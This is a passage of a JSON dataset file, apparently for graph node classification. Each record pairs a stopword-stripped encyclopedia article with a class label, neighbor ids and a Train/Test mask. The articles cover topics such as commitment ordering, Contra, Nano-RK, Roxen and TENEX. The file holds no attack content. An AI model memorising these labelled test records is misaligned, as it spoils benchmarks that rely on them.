autonomy even later years public introduction commitment ordering general solution 1991 problem still considered many unsolvable quotation 1997 article proposing relaxed global serializability solution see relaxing global serializability referencing commitment ordering co articles co solution supports effectively full acid properties full local autonomy well meeting requirements posed problem statement section apparently misunderstood similar thinking see also following quotation 1998 article also quoted article proposes relaxed global serializability solution referencing co work co solution global serializability bridges different concurrency control protocols substantial concurrency reduction typically minor maintains autonomy local dbmss evidently also co misunderstood misunderstanding continues 2010 textbook authors relaxed global serializability technique two level serializability emphasized described detail co mentioned hand following quotation co appears 2009 book characteristics properties co solution discussed several solutions partial proposed global serializability problem among problem global serializability quite intensively researched subject late 1980s early 1990s commitment ordering co provided effective general solution problem insight understanding possible generalizations strong strict two phase locking ss2pl practically almost exclusively utilized conjunction two-phase commit protocol 2pc since 1980s achieve global serializability across databases important side-benefit co automatic global deadlock resolution provides applicable also distributed ss2pl though global deadlocks important research subject ss2pl automatic resolution overlooked except co articles today 2009 time quite many commercial database system types existed many non-relational databases relatively small multi database systems considered key database scalability database systems interoperability global serializability urgently needed since tremendous progress computing power storage communication networks resulted orders magnitude increases centralized databases sizes transaction rates remote access database capabilities well blurring boundaries centralized computing distributed one fast low-latency local networks e.g. infiniband together progress database vendors distributed solutions primarily popular ss2pl 2pc based de facto standard allows interoperability among different vendors ss2pl-based databases ss2pl 2pc technologies gained substantial expertise efficiency workflow management systems database replication technology cases provided satisfactory sometimes better information technology solutions without multi database atomic distributed transactions databases different concurrency control bypassing problem result sense urgency existed problem period general high-performance distributed atomic transactions databases different concurrency control types reduced however need concurrent distributed atomic transactions fundamental element reliability exists distributed systems also beyond database systems need global serializability fundamental correctness criterion transactional systems see also distributed serializability serializability proliferation internet cloud computing grid computing small portable powerful computing devices e.g. smartphones sophisticated systems management need effective global serializability techniques ensure correctness among distributed transactional applications seems increase thus also need commitment ordering including popular databases special case ss2pl ss2pl though meet requirements many transactional objects commitment ordering commit ordering co high-performance fault tolerant conflict serializability providing solution proposed fully distributed central computing component data-structure needed general mechanism combined seamlessly local database concurrency control mechanism see technical summary since co property schedule necessary condition global serializability autonomous databases context concurrency control provides general solution autonomous databases i.e. autonomous databases comply co global serializability may violated seemingly sheer luck co solution possesses many attractive properties overhead incurred co solution locally detecting conflicts already done known serializability mechanism pessimistic optimistic locally ordering database system local commits local transactions voting atomic commitment global transactions overhead low net effect co may delays commit events never delay ss2pl average less makes co instrumental global concurrency control multidatabase systems e.g. federated database systems underlying theory commitment ordering part serializability theory sound elegant even mathematically beautiful referring structure dynamics conflicts graph cycles deadlocks interesting implications transactional distributed applications qualities co list except first three also possessed ss2pl special case co blocking constraining partially explains popularity ss2pl solution practically solution many years achieving global serializability however property 9 automatic resolution global deadlocks noticed ss2pl database research literature today 2009 except co publications since phenomenon voting-deadlocks environments automatic resolution atomic commitment protocol overlooked existing database systems including major commercial database systems strong strict two phase locking ss2pl based already co compliant thus participate co based solution global serializability multidatabase environments without modification except popular multiversioning additional co aspects considered achieving global serializability across ss2pl based databases using atomic commitment primarily using two phase commit 2pc employed many years i.e. using co solution specific special case however reference known prior co notices special case automatic global deadlock resolution atomic commitment protocol augmented-conflict-graph global cycle elimination process virtually existing distributed transaction processing environments supporting products rely ss2pl provide 2pc matter fact ss2pl together 2pc become de facto standard solution homogeneous concurrency control one suboptimal serializability strictness needed see strict commitment ordering sco still quite effective cases sometimes cost increased computing power needed relatively optimum however better performance relaxed serializability used whenever applications allow allows inter-operation among ss2pl-compliant different database system types i.e. allows heterogeneity aspects concurrency control ss2pl constraining schedule property takes combined property example combined optimistic property result optimistic anymore rather characteristically ss2pl hand co change data-access scheduling patterns combined property characteristics remain unchanged since also co uses atomic commitment e.g. 2pc achieving global serializability ss2pl co compliant database system transactional object transparently join existing ss2pl based environments use 2pc maintain global serializability without environment change makes co straightforward natural generalization ss2pl conflict serializability based database system practical purposes commitment ordering quite widely known inside transaction processing databases communities digital equipment corporation dec since 1990 company confidentiality due patenting approach transaction management converging grid computing cloud computing see history commitment ordering techniques developed relaxed global serializability i.e. guarantee global serializability see also relaxing serializability among several publications local database system relaxed serializability methods compromise serializability performance gain utilized application tolerate possible resulting inaccuracies integrity unharmed unclear various proposed relaxed global serializability methods compromise global serializability provide performance gain commitment ordering guarantees global serializability typically declared intention methods performance gain effective global serializability methods apparently unknown inventors rather correctness criteria alternatives due lack known effective global serializability method oddly introduced years co introduced even quote co without realizing provides effective global serializability solution thus without providing performance comparison co justify alternatives global serializability applications e.g. two-level serializability two-level serializability even presented major global concurrency control method 2010 edition text-book databases authored two original authors two-level serializability one avi silberschatz also author original strong recoverability articles book neither mentions co references strangely apparently consider co valid global serializability solution another common reason nowadays global serializability relaxation requirement availability internet products services requirement typically answered large scale data replication straightforward solution synchronizing replicas updates database object including updates single atomic distributed transaction however many replicas transaction large may span several computers networks likely unavailable thus transaction likely end abort miss purpose consequently optimistic replication lazy replication often utilized e.g. many products services google amazon yahoo alike global serializability relaxed compromised eventual consistency case relaxation done applications expected harmed classes schedules defined relaxed global serializability properties either contain global serializability class incomparable differentiates techniques relaxed global conflict serializability rgcsr properties relaxed conflict serializability rcsr properties rgcsr typically different way global cycles span two databases global conflict graph handled distinction global local cycles exists rcsr properties rgcsr rcsr contains rgcsr typically rgcsr techniques eliminate local cycles i.e. provide local serializability achieved effectively regular known concurrency control methods however obviously eliminate global cycles would achieve global serializability",
    "neighbors": [
      10048,
      5441,
      4194,
      5956,
      11620,
      3398,
      9069,
      11377,
      8979,
      2901,
      7446,
      7802,
      1049,
      5658,
      1083,
      7581
    ],
    "mask": "None"
  },
  {
    "node_id": 11378,
    "label": 7,
    "text": "Visual_Risk:visual risk visual risk treasury management software provider consulting company headquartered sydney australia visual risk part gtreasury software services gtreasury name company provides treasury risk management software specializes market risk management visual risk one australia original fintech companies company treasury software provider visual risk founded richard hughes paul nailand headquartered sydney richard hughes paul nailand currently serve managing directors visual risk december 2015 visual risk best risk management solution treasury management international 2015 awards awards considered benchmark industry april 2018 gtreasury acquired visual risk integrated visual risk risk management software offering bolster existing treasury cash management tool visual risk modular treasury risk management system consists five modules risk analytics asset-liability management treasury management hedge accounting cash liquidity modular system used separately fully integrated system addition visual risk provides reporting dashboard software deployed either locally via cloud 2014 visual risk partnered kpmg australia visual risk analyze kpmg hedging transactions client exposures",
    "neighbors": [
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 11379,
    "label": 4,
    "text": "Intrusion_tolerance:intrusion tolerance intrusion tolerance fault-tolerant design approach defending information systems malicious attack abandoning conventional aim preventing intrusions intrusion tolerance instead calls triggering mechanisms prevent intrusions leading system security failure",
    "neighbors": [
      7085
    ],
    "mask": "Train"
  },
  {
    "node_id": 11380,
    "label": 3,
    "text": "Contra_(video_game):contra video game according japanese promotional materials contra set distant future year 2633 a.d. evil red falcon organization set base fictional galuga archipelago near new zealand plot wipe humanity two commandos bill rizer lance bean earth marine corp contra unit elite group soldiers specializing guerrilla warfare sent island destroy enemy forces uncover true nature alien entity controlling promotional materials us arcade version downplays futuristic setting game manual later nes home computer versions changing game setting future present day location galuga amazon jungle contra employs variety playing perspectives include standard side view pseudo-3d view player proceeds shooting moving towards background addition left right fixed screen format player gun aimed upwards default two people play simultaneously one player bill blond-haired commando white tank top blue bandanna player lance shirtless dark-haired commando red bandanna controls consists eight-way joystick two action buttons shooting left jumping right one protagonists jumps curls somersault instead conventional jump like games joystick controls player movement walking jumping also aiming side view stages player shoot leftward rightward upward standing well horizontally diagonally running player also shoot eight directions including downwards jumping pressing joystick downwards standing cause character lie stomach allowing avoid enemy fire shoot low targets jump button pressed crouching higher platform player drop lower level player default weapon rifle unlimited ammunition upgraded one four guns obtained destroying pill box sensors flying item capsules containing defeating red-clad guards enemy bases consist machine gun fires rapidly fire button held laser gun shoots powerful beam fireball gun shoots rounds corkscrew pattern spread gun shoots five individual bullets individual directions also two auxiliary power-ups appear certain areas player armed default gun rapid bullets upgrade increases firing speed player shots barrier makes invulnerable limited period exception machine gun laser gun item comes form falcon-shaped symbol marked letter representing function f r b arcade version contra consists seven stages number stages level structures varies later versions first stage side-scrolling level player dropped jungle must fend enemy initial line defense reaching entrance first base must destroy large sensor enter base game switches 3d view second stage player character must fight way series passageways inside base time runs display top screen shows map base time remaining player must destroy generator side passageway order deactivate electric current preventing access third stage set core base fixed screen player must destroy enemy defense system order expose final target giant eyeball shoots fireballs stages 4 6 proceed similarly first three stages stage 4 vertical-scrolling level player must jump way top waterfall reaching entrance second base player must destroy large diamond-shaped sensor guarded defense system order clear stage stage 5 another 3d stage set inside another base stage 6 another boss battle time pair heads split two images heads damaged split images aligned together seventh final stage returns side-scrolling format first stage player fights way enemy final line defense includes hovercraft armored trucks giant helmeted soldiers proceeding areas snowfield energy plant hangar reaching alien lair regular enemy soldiers replaced otherworldly creatures player must fight giant alien head spawns larvae mouth reaching final target heart-like creature must destroyed order complete mission player loses life character bill lance gets touched enemy enemy bullet fails complete base stage time limit falls bottom screen visible platform happens revert default weapon next life losing lives player continue inserting coins necessary pressing start three times second player join-in anytime one player loses lives must wait player loses lives well continue together arcade game released three versions japanese american versions virtually identical aside japanese version using kanji characters spell game title however european version titled gryzor allows two players play game alternating rather simultaneously license konami ocean software produced ports contra title gryzor zx spectrum commodore 64 amstrad cpc released europe 1988 commodore 64 version released north america contra title ocean ports patterned original arcade version game ibm pc version developed banana development inc released north america version released europe gryzor name cover illustration ocean gryzor ports bob wakelin inspired different poses actor arnold schwarzenegger film predator illustration later used packaging nes version well msx2 version contra released nintendo entertainment system north america february 1988 version produced in-house konami features several differences arcade release order better suit nes hardware example sprites effects like explosions shown 30fps instead 60fps work around sprite limitations system another game use technique recca famicom version contains cutscenes additional music track environment effects removed nes version game played one two players due graphical limitations nes bill lance lost individualized character designs instead depicted shirtless commandos distinguished colors pants blue pants first player red pants second one player loses lives given option use player stock keep fighting power-up icons machine gun laser gun also changed represented letter-based falcon symbols l used weapons rapid bullets barrier power-ups also common version since unlike arcade game flying item capsules appear regardless weapon player character currently posseses nes version introduces seventh item clears screen on-screen enemies obtained nes version recomposes 7 stages arcade version 8 stages stages 2 3 combined one stage resulting renumbering waterfall level stage 4 stage 3 stages 5 6 combined new stage 4 final four stages nes version snowfield energy zone hangar alien lair based different areas featured arcade version final stage level designs drastically different arcade version two base stages example stage 2 4 longer maze-like structures time limit involved boss waterfall stage also changed diamond-shaped sensor alien statue contra one early nes games feature konami code inputting code title screen starts player thirty lives instead usual three cheat effect well player runs lives uses continue retry stage contra released famicom japan february 9 1988 gameplay remains identical nes version released around month famicom version custom-made multi-memory controller konami produced called vrc2 contrast unrom board used nes counterpart allowed inclusion cut-scenes graphical effects possible nes version game begins prologue sequence explaining game backstory followed map galuga archipelago shown start every stage indicate player progress cut-scenes also shown stages depicting bill lance giving status report current situation headquarters later stages shooting gun towards screen ending sequence also slightly different player holds select start buttons credits sequence secret message displayed konami logo differences include addition sound test mode added background animations certain stages windblown palm leaves stage 1 snowstorm stage 5 different stage clear jingle player clears final stage level select cheat code probotector modified version nes contra released pal region december 28 1990 version redesigns human protagonists enemy characters give robotic appearance done circumvent bpjm censorship laws germany prohibits sales violent video games minors subsequent contra games home consoles followed suit released pal region probotector title featuring similar modifications beginning konami abandoned probotector title localized games minimal changes msx2 version contra released konami exclusively japan may 26 1989 msx2 version greatly differs arcade nes versions due hardware limitations msx2 game scroll instead uses flip-screens like msx2 games metal gear vampire killer game uses scc sound chip rather one-hit kills energy gauge allows bill rizer take one shot hit losing life two main power-ups msx2 version falcon-shaped power-up increases player walking shooting speed well gun-shaped power-up allows player change current weapon picking weapon power-up player choose default normal gun four weapons spread gun featured version replaced rear gun similar tailgun gradius ii fires two directions time msx2 version contra composed 19 stages stages 1 6 drawn directly arcade version whereas stages 7 9 based different areas featured final stage arcade version matter similar final four stages nes version stages 10 19 new version take place primarily underground facility underneath galuga archipelago unlike arcade nes versions msx2 version single-player lance bean appear form continuation feature player loses lives game immediately however game master ii utility cartridge used save progress via s-ram backup feature much game popularity came two-player simultaneous gameplay uncommon feature video games time contra release successful arcades game became remained widely popular remembered ported nintendo entertainment system 1988 allgame editor skyler miller praised contra touting game became standard future platform shooters would judged japanese gaming magazine famitsu gave famicom nes version game score 27 40 computer gaming world called contra nes truly outstanding action epic set scrolling beautifully drawn playfield ms-dos version game reviewed 1989 dragon hartley patricia kirk lesser role computers column contra voted gaming website ign toughest game beat nintendo power ranked seventh best nes game calling one best multiplayer nes games gamesradar ranked 10th best nes game ever made considering possibly superior arcade version game informer also included list best games ever number 13 staff noted revolutionary fun 2017 contra ranked 82nd scientifically proven best video games time statistical meta-analysis compiled warp zoned 44 top games lists published 1995 2016 contra followed super contra year later contra sequel arcades developed in-house konami following success nes adaptations original sequel retitled super c american release subsequent sequels would produced specifically home console market super nes genesis becoming one konami landmark series series 11 installments music arcade version contra one soundtracks included video game album konami game music vol.4 jax released alfa records may 10 1988 cd catalog 28xa-201 cassette alc-22922 vinyl alr-22922 april 2017 beijing starlit movie tv culture announced producing live-action film version contra china wei nan listed screenwriter project scheduled release june 6 2018 meet release date",
    "neighbors": [
      5538,
      3561,
      10316,
      6797,
      9006,
      9166,
      1776,
      8819,
      10931,
      4405,
      11477
    ],
    "mask": "Test"
  },
  {
    "node_id": 11381,
    "label": 2,
    "text": "Input/Output_Supervisor_Block:input/output supervisor block input/output supervisor block iosb data structure employed exclusively start input/output interface mvs/370 successor ibm mainframe operating systems iosb describes i/o request passes parameters receives responses input/output supervisor ios iosb always paired service request block srb srb schedules processor activity required available processor connection i/o request although i/o operation may initiated another processor distinction allowed example effective use so-called attached processors processors connected i/o devices common early days mvs/370 installations requirements data processing power e.g. processor accesses also called cpu-bound applications perhaps i/o processing power e.g. disk tape accesses also called i/o-bound applications",
    "neighbors": [
      11656,
      11131,
      7195,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 11382,
    "label": 6,
    "text": "Nasan:nasan nasan clustered file system shared disk file system created company dataplow nasan software enables high-speed access shared files located shared storage area network san -attached storage devices utilizing high-performance scalable data transfers inherent storage area networks manageability network attached storage nas nasan derives name combination network attached storage nas storage area network san nasan clustered file sharing extension traditional lan file sharing yet utilizes storage area networks data transfers deploying nasan cluster entails configuring lan file sharing installing nasan file system software connecting computers storage devices san supports linux solaris operating systems supports san-based block-level storage protocols including fibre channel iscsi",
    "neighbors": [
      2314,
      823,
      7983,
      7863,
      2395
    ],
    "mask": "Test"
  },
  {
    "node_id": 11383,
    "label": 2,
    "text": "Nano-RK:nano-rk nano-rk wireless sensor networking real-time operating system rtos real-time operating system rtos carnegie mellon university designed run micro-controllers use sensor networks nano-rk supports fixed-priority fully preemptive scheduler fine-grained timing primitives support real-time task sets nano implies rtos small consuming 2 kb ram using 18 kb flash rk short resource kernel resource kernel provides reservations often system resources consumed example task might allowed execute 10 ms every 150 ms cpu reservation node might allowed transmit 10 network packets per minute network reservation reservations form virtual energy budget ensure node meets designed battery lifetime well protecting failed node generating excessive network traffic nano-rk open source written c runs atmel-based firefly sensor networking platform micaz motes well msp430 processor following article discusses tradeoffs associated using rtos sensor networks nanork takes advantage priority-based preemptive scheduling help honor real-time factor deterministic thus ensuring task timeliness synchronization due characteristic limited battery power wireless node nano-rk provides cpu network sensor efficiency use virtual energy reservations labeling system resource kernel energy reservations enforce energy communication budgets minimize negative impact node ’ operational lifetime unintentional errors malicious behavior nodes within network supports packet forwarding routing network scheduling protocols help light-weight wireless networking stack compared current sensor operating systems nano-rk provides rich functionality timeliness scheduling small-footprint embedded resource kernel rk static configuration nano-rk uses static design-time approach energy usage control dynamic task creation disallowed nano-rk requiring application developers set task reservation quotas/priorities static testbed design design allows developers create energy budget task order maintain application requirements well energy efficiency throughout system ’ lifetime using static configuration approach runtime configurations well power requirements predefined verified designer system deployed executed real world approach also helps guarantee stability small-footprint characteristics compared traditional rtoss watchdog timer support watchdog software timer triggers system reset action system hangs crucial faults extended period time watchdog mechanism bring system back nonresponsive state normal operation waiting timer goes subsequently rebooting device nano-rk watchdog timer tied directly processor ’ reset signal reboot error default enabled system boots reset time scheduler executes system fails respond within predefined time period system reboot run initialization instruction sequence hopefully regain control deep sleep mode another feature nano-rk deep sleep mode energy efficiency reasons eligible tasks run system powered given option enter deep sleep mode system deep sleep mode deep sleep timer wake system predefined latency period waking deep sleep mode next context swap time set guarantee cpu wakes time sensor node wish perform deep sleep also presented choice go low energy consumption state still managing peripherals nano-rk implemented double-linked list ready queue nodes within fixed-size array termed ready queue orders ready tasks decreasing order whichever task ’ priorities higher number tasks running within nano-rk implementation statically-configured testbed deployment ready queue size also fixed number tasks ready run fixed-length array named nrk readyq found within nrk defs.h file along two pointers reference two important cells within array free node pointer free node head node pointer head node point next cell array allocated current highest priority task ready run respectively core nano-rk static preemptive real-time scheduler priority-based energy efficient priority-based preemptive scheduling scheduler always selects highest priority task ready queue save energy tasks poll resource rather tasks blocked certain events unlocked events occur task ready queue system powered save energy system working one one task current task signified nrk cur task tcb running predefined period important job scheduler decide task run next long next task run scheduler triggered run",
    "neighbors": [
      10883,
      6276,
      11267,
      9366,
      7319,
      2201,
      9628,
      7341,
      10030,
      7983,
      2045,
      6207,
      321,
      10561,
      1221,
      2117,
      8262,
      9927,
      6985,
      9162,
      341,
      10590,
      6624,
      5603,
      5220,
      1253,
      1126,
      10482,
      3197
    ],
    "mask": "Test"
  },
  {
    "node_id": 11384,
    "label": 3,
    "text": "Colossus_Chess:colossus chess colossus chess series chess-playing computer programs developed martin bryant commercially available various home computers 1980s bryant started colossus chess 1983 using white knight mk 11 program winner 1983 european microcomputer chess championship basis developed apple ii first commercially released commodore 64 colossus chess 2.0 cds micro systems 1984 number releases 8-bit microcomputers followed version 3.0 released 1984 atari 8-bit family computers published english software followed 4.0 1985 released formats day published cds per games time acorn electron implementation required part screen memory used working space colossus chess featured time-controlled play game clocks opening book 3,000 positions problem-solving mode could solve normal mates selfmates helpmates pondering opponent time three-dimensional chessboard introduced colossus chess 4.0 releases written assembly language appropriate cpu zx spectrum version could examine average 170 positions per second uncommon microcomputer chess programs era colossus full implementation rules chess including underpromotion fifty-move rule draw repetition draw insufficient material colossus also able execute basic checkmates including difficult bishop knight checkmate program subsequently ported atari st 1988 amiga 1989 ibm pc 1990 title colossus chess x new releases featured four chess sets enhanced graphics developed assistance gary thomlinson carl cropley opening book extended 11,000 positions program ability learn past playing experiences work done colossus chess 1991 2005 martin bryant created completely new freely available windows version conforming universal chess interface written c converted c speed finally publicly released 2006. latest version 2008b info gave colossus chess iv commodore 64 three stars five stating less attractive darn sight playable chessmaster 2000 keyboard joystick controls magazine warned difficulty remembering shifted keyboard control sequences ... badly need quick-reference card",
    "neighbors": [
      1248,
      477,
      3722,
      8429,
      9006,
      10862,
      11384,
      11033,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 11385,
    "label": 9,
    "text": "GNU_Data_Language:gnu data language gnu data language gdl free alternative idl interactive data language together library routines gdl developed serve tool data analysis visualization disciplines astronomy geosciences medical imaging gdl licensed gpl open-source numerical data analysis tools similar gdl include gnu octave ncar command language ncl perl data language pdl r scilab scipy yorick gdl language dynamically-typed vectorized object-oriented programming capabilities gdl library routines handle numerical calculations e.g fft data visualisation signal/image processing interaction host os data input/output gdl supports several data formats netcdf hdf v4 v5 grib png tiff dicom graphical output handled x11 postscript svg z-buffer terminals last one allowing output graphics plots saved raster graphics formats gdl features integrated debugging facilities breakpoints gdl python bridge python code called gdl gdl compiled python module gdl uses eigen c++ library numerical library similar intel mkl excellent computing performance multi-cores processors better benchmark idl large matrix operations packaged versions gdl available several linux bsd flavours well mac os x source code compiles microsoft windows since gdl 0.9.3 unix systems including solaris gdl official gnu package",
    "neighbors": [
      8611,
      5703,
      5833,
      8554,
      6797,
      462,
      8079,
      9714,
      8628,
      11126,
      823,
      7580
    ],
    "mask": "Test"
  },
  {
    "node_id": 11386,
    "label": 8,
    "text": "Roxen_(web_server):roxen web server roxen free software web server produced roxen internet software company based linköping sweden named nearby lake roxen released gnu general public license roxen originally appeared spinner mid-1990s written ulpc pike heyday roxen used large companies realnetworks granada media xmission mci roxen many aspects ahead time featuring web-based graphical user interface gui administration interface loadable modules could written several languages including pike later java dynamic content generation comprehensive caching system replication systems multi-headed servers embedded sql server data-heavy server operations well broad support databases roxen built meet needs content creators rxml roxen macro language server-side scripting language integrated roxen language capabilities scripting languages like perl html-like syntax makes familiar content creators many roxen sites developed using mvc pattern notable tags include roxen modules typically provide functionality extending rxml rxml tags contain inline documentation used fill online manual included roxen documentation site every default server installation rxml also provides variable system variables exist within domain scope e.g form fields passed query accessible form.fieldname user defined variables stored var scope unfortunately attempt explain two methods variable instantiation documentation confuses people cases variables referred name also possible instantiate insert value variable anywhere in- out-side tags/markup using xml entity-style markup e.g page.path optionally one specify encoding/escaping instance e.g form.username mysql insert user-submitted value form safely sql database page.path js make variable javascript safe",
    "neighbors": [
      1920,
      4485,
      7430,
      10506,
      9229,
      7567,
      7695,
      1937,
      7443,
      1556,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      7338,
      9387,
      44,
      5677,
      10413,
      11439,
      10800,
      6714,
      10622,
      1991,
      11134,
      595,
      1363,
      4439,
      3545,
      7646,
      225,
      1250,
      865,
      2404,
      4837,
      7144,
      6379,
      9580,
      2287,
      11376,
      8691,
      10611,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 11387,
    "label": 5,
    "text": "Certificate_Management_Protocol:certificate management protocol certificate management protocol cmp internet protocol used obtaining x.509 digital certificates public key infrastructure pki described one two protocols far use certificate request message format crmf described protocol certificate management cms cmc described obsolete version cmp described respective crmf version cmp messages encoded asn.1 using der method usually transported http certificate authority ca issuing legal certificates acts server pki using cmp one clients obtaining digital certificates means protocol called end entity ee none number registration authorities ra used mediate ees ca end entity utilize cmp obtain certificates ca done initial registration/certification key pair update certificate update message sequence means revocation request also get one certificates revoked using cross-certification request ca get certificate signed another ca case end entity lost private key stored ca might recovered requesting key pair recovery several means transportation foreseen conveying cmp messages content-type used application/pkixcmp older versions draft used application/pkixcmp-poll application/x-pkixcmp application/x-pkixcmp-poll",
    "neighbors": [
      5470,
      7364,
      517,
      1836,
      10924,
      10831,
      6704,
      6993,
      7985,
      9909,
      2904,
      5469,
      4797,
      62
    ],
    "mask": "Test"
  },
  {
    "node_id": 11388,
    "label": 2,
    "text": "Hyperbola_GNU/Linux-libre:hyperbola gnu/linux-libre hyperbola gnu/linux-libre operating system i686 x86-64 architectures based arch snapshots debian development includes gnu operating system components linux-libre kernel instead generic linux kernel hyperbola gnu/linux-libre listed free software foundation completely free operating system true free system distribution guidelines hyperbola born 17th annual fórum internacional software livre porto alegre brazil 5 august 2017 support systemd dropped favor openrc default init system support init freedom campaign begun devuan 6 december 2018 hyperbola first brazilian distribution recognized completely free project gnu making part fsf list free distributions hyperbola established social contract hyperbola social contract commits project free software community free culture privacy stability follow arch-based system packaging yet principles stability development maintenance debian covenant included gnu free system distribution guidelines hyperbola established packaging guidelines hyperbola packaging guidelines contain collection common issues severity placed development backporting package releases debian patches hyperbola aliases stable releases using galaxy names codenames chosen list nearest known galaxies milky way ascending order distance stable version hyperbola gets released approximately every three years point releases available every months hyperbola release receive two years extra security updates end life eol however point releases made hyperbola release receive five years security support total two ways install hyperbola gnu/linux-libre either scratch using live images migrating existing arch-based system",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      3618,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      2180,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      5356,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      5397,
      6934,
      4887,
      8992,
      10016,
      10530,
      6436,
      2853,
      3369,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      3969,
      390,
      1416,
      905,
      4493,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 11389,
    "label": 7,
    "text": "Jira_Studio:jira studio jira studio integrated hosted software development suite developed atlassian software systems jira studio included subversion revision control jira issue tracking bug tracking confluence content management jira agile previously known greenhopper agile planning management bamboo continuous integration crucible code review fisheye source code repository browsing jira studio retired february 2013 atlassian cloud offers saas hosted model integrations plugin capability licensed per product jira studio supported atlassian ide connectors eclipse visual studio intellij idea information jira studio could displayed external systems using opensocial gadgets project information could externally accessed using activity streams programmatic access jira studio provided apis based rest java",
    "neighbors": [
      7983,
      5612,
      5677,
      4919
    ],
    "mask": "Train"
  },
  {
    "node_id": 11390,
    "label": 2,
    "text": "TENEX_(operating_system):tenex operating system tenex operating system developed 1969 bbn pdp-10 later formed basis digital equipment corporation tops-20 operating system 1960s bbn involved number lisp-based artificial intelligence projects darpa many large era memory requirements one solution problem add paging software lisp language allowing write unused portions memory disk later recall needed one system developed pdp-1 mit daniel murphy joined bbn early dec machines based 18-bit word allowing addresses encode 262-kword memory machines based expensive core memory included nowhere near required amount pager used significant bits address index table blocks magnetic drum acted pager backing store software would fetch pages needed re-write address point proper area ram 1964 dec announced pdp-6 dec still heavily involved mit ai lab many feature requests lisp hackers moved machine 36-bit computing especially useful lisp programming 18-bit address space word storage systems contained two addresses perfect match common lisp car cdr operations bbn became interested buying one ai work became available wanted dec add hardware version murphy pager directly system addition every program system would paging support invisibly making much easier sort programming machine dec initially interested soon 1966 announced fact dropping pdp-6 concentrating solely smaller 18-bit new 16-bit lines pdp-6 expensive complex sold well reasons long became clear dec entering 36-bit business would become pdp-10 bbn started talks dec get paging subsystem new machine known cpu name ka-10 dec terribly interested however one development talks support second virtual memory segment allowing part user address space mapped separate potentially read-only region physical memory additionally dec firm keeping cost machine low possible supporting bare-bones systems minimum 16k words core omitting fast semiconductor register option substituting core cost considerable performance decrease bbn nevertheless went ahead purchase several pdp-10s decided build hardware pager period debate began operating system run new machines strong arguments made continued use tops-10 order keep existing software running minimum effort would require re-write tops support paging system seemed like major problem time tops support number features developers wanted end decided make new system include emulation library would allow run existing tops-10 software minor effort developer team—amongst daniel murphy daniel g. bobrow—chose name tenex ten-extended new system included full virtual memory system—that could programs access full 18 bit address space 262144 words virtual memory every program could time pager system would handle mapping would always copying data backing store needed change needed pager able hold several sets mappings ram store one program using system pager also held access time information order tune performance resulting pager fairly complex filling full-height 19 rackmount chassis one notable feature tenex user-oriented command line interpreter unlike typical systems era tenex deliberately used long command names even included non-significant noise words expand commands clarity instance unix uses codice_1 print list files directory whereas tenex used codice_2 codice_3 command word codice_4 noise added make purpose command clearer relieve users need type long commands tenex used command completion system understood unambiguously abbreviated command words expanded partial command words complete words phrases instance user could type codice_5 escape key point tenex would replace codice_5 full command completion feature also worked file names took effort part interpreter system allowed long file names human-readable descriptions tenex also included command recognition help system typing question mark codice_7 printed list possible matching commands return user command line question mark removed command line completion help live current clis like tcsh tenex became fairly popular small pdp-10 market external pager hardware developed small business early 1970 dec started work upgrade pdp-10 processor ki-10 bbn attempted get dec support complex pager indirect page tables instead dec decided much simpler single-level page mapping system compromise impacted system sales point tenex popular customer-written pdp-10 operating systems would run new faster ki-10s correct problem dec pdp-10 sales manager purchased rights tenex bbn set project port new machine around time murphy moved bbn dec well helping porting project work centered emulating bbn pager hardware combination software ki-10 simpler hardware speed ki-10 compared pdp-6 made possible additionally porting effort required number new device drivers support newer backing store devices used new tenex shipping dec started work kl-10 intended low-cost version ki-10 going stanford university ai programmers many mit alumni working project build pdp-10 ten times faster original ka-10 project evolved foonly line computers dec visited many ideas folded kl-10 project year ibm also announced machine virtual memory making standard requirement computer end kl integrated number major changes system end lower cost start new decsystem-20 would run version tenex default operating system functional upgrades kl-10 processor architecture limited significant new feature called extended addressing modified pager microcode running model b hardware revision enlarge user virtual address space effective address calculations instructions located beyond original 18-bit address space performed 30 significant bits although 23-bit virtual address space supported program code located original 18-bit address space unchanged semantics backward compatibility first in-house code name operating system viros virtual memory operating system customers started asking questions name changed snark dec could truthfully deny project called viros name snark became known name briefly reversed become krans quickly abandoned someone objected krans meant funeral wreath swedish though simply means wreath part story may apocryphal ultimately dec picked tops-20 name operating system tops-20 marketed hacker community mindful origins quickly dubbed twenex portmanteau twenty tenex even though point little original tenex code remained analogously differences v7 unix bsd dec people cringed heard twenex term caught nevertheless written abbreviation 20x also used twenex successful popular fact period early 1980s commanded fervent culture partisans unix its—but dec decision scrap internal rivals vax architecture vms os killed dec-20 put end twenex brief period popularity dec attempted convince tops-20 users convert vms instead late 1980s tops-20 users migrated unix loyal group tops-20 enthusiasts kept working various projects preserve extend tops-20 notably mark crispin panda tops-20 distribution",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      7217,
      9784,
      10809,
      7739,
      576,
      577,
      10333,
      97,
      8298,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150,
      2179,
      10883,
      6797,
      9366,
      6296,
      7325,
      9887,
      2213,
      3248,
      6837,
      9909,
      9911,
      8388,
      9932,
      5840,
      7382,
